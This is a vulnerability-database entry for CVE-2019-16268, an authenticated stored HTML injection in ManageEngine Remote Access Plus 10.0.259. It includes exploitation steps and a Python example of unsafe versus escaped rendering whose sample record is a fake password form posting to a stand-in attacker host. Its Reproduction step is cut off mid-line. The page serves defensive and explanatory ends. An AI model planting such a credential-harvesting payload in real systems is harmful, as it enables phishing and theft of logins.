CVE-2019-16268
Description
Zoho ManageEngine Remote Access Plus 10.0.259 allows HTML injection via the Description field on the Admin - User Administration userMgmt.do?actionToCall=ShowUser screen.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
ManageEngine Remote Access Plus 10.0.259 is vulnerable to HTML injection via the Description field, allowing attackers to inject arbitrary HTML code.
Vulnerability
ManageEngine Remote Access Plus version 10.0.259 is vulnerable to HTML injection via the Description field on the Admin - User Administration screen (userMgmt.do?actionToCall=ShowUser). An attacker with valid credentials can inject arbitrary HTML code into the Description parameter when creating or editing a role. The issue was fixed in build 100454 released on March 18, 2020 [1][2].
Exploitation
An attacker must first authenticate with valid credentials. Then, navigating to Admin > User Administration > Roles, they can click "+Add Role" and insert a malicious HTML payload into the Description field. The injected HTML is stored and executed when the page is rendered. Attackers could craft a link leading to a page containing the injection and send it to a victim, leveraging trust in the domain to perform phishing attacks [1].
Impact
Successful exploitation allows an attacker to inject arbitrary HTML code into the vulnerable page. This can be used to display fake login forms, misleading content, or other social engineering attacks to steal credentials or sensitive information. The vulnerability does not lead to direct code execution but facilitates client-side attacks [1].
Mitigation
ManageEngine released a fix in Remote Access Plus build 100454 on March 18, 2020. Users should update to the latest build available from the ManageEngine website. The cloud version of Remote Access Plus is not affected. No workaround is documented [2].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Zoho ManageEngine / Remote Access Plus
  - Range: = 10.0.259
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization on the Description field allows arbitrary HTML to be stored and rendered in the browser."
Attack vector
An attacker with valid login credentials navigates to the Roles section, clicks the +Add Role button, and injects arbitrary HTML into the Description parameter. The injected HTML is stored and rendered when the page is viewed, enabling a phishing scenario where the attacker crafts a malicious link, sends it to a victim via email, and the victim—trusting the legitimate domain—enters credentials that are exfiltrated to the attacker's server [ref_id=1].
Affected code
The vulnerability exists in the Admin - User Administration screen at the endpoint `userMgmt.do?actionToCall=ShowUser`. The Description field on the Add Role form does not sanitize user-supplied input, allowing arbitrary HTML to be stored and rendered [ref_id=1].
What the fix does
The advisory recommends filtering metacharacters from user input to prevent HTML injection [ref_id=1]. No patch diff is provided in the bundle, so the specific code changes are not available; the vendor would need to apply output encoding or input sanitization on the Description field and other vulnerable parameters.
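Added illustration, not ManageEngine's code (no patch is in the bundle): the "before" string concatenation beside the output-encoded rendering the advisory calls for, plus a helper that flags already-stored descriptions containing markup; the role records and the form payload are constructed for this example.

```python
import html
import re

# Constructed sample of stored Role records, in the shape a page handler
# might load them from the database (values are made up for this example).
ROLES = [
    {"name": "Helpdesk", "description": "Tier-1 support staff"},
    {"name": "Auditor", "description": '<form action="https://attacker.invalid/collect">'
                                        'Session expired, re-enter password: '
                                        '<input name="pw"></form>'},
]


def render_role_row_unsafe(role):
    """'Before' behaviour: the stored description is concatenated into the
    page unchanged, so browser-interpretable markup survives into the DOM."""
    return f"<tr><td>{role['name']}</td><td>{role['description']}</td></tr>"


def render_role_row(role):
    """Fixed behaviour: HTML-entity encode every stored field at the point it
    is written into an HTML text node. quote=True also encodes quotes, which
    matters if the same value is ever placed inside an attribute."""
    name = html.escape(role["name"], quote=True)
    desc = html.escape(role["description"], quote=True)
    return f"<tr><td>{name}</td><td>{desc}</td></tr>"


# Tag-like token: '<', optional '/', a letter, anything up to the closing '>'.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def find_markup_in_descriptions(roles):
    """Defensive audit: names of roles whose stored description already holds
    tag-like markup, so existing rows can be reviewed after upgrading (output
    encoding stops rendering of new injections but does not clean old data)."""
    return [r["name"] for r in roles if TAG_RE.search(r["description"])]
```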
Preconditions
- Auth: Attacker must have valid login credentials to access the ManageEngine Remote Access Plus application.
- Config: The application must be running ManageEngine Remote Access Plus version 10.0.259.
- Network: Attacker must have network access to the application's web interface.
Reproduction
1. Log in with valid credentials and navigate to the Roles section.
2. Click the +Add Role button.
3. Insert an HTML injection payload (e.g., `
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.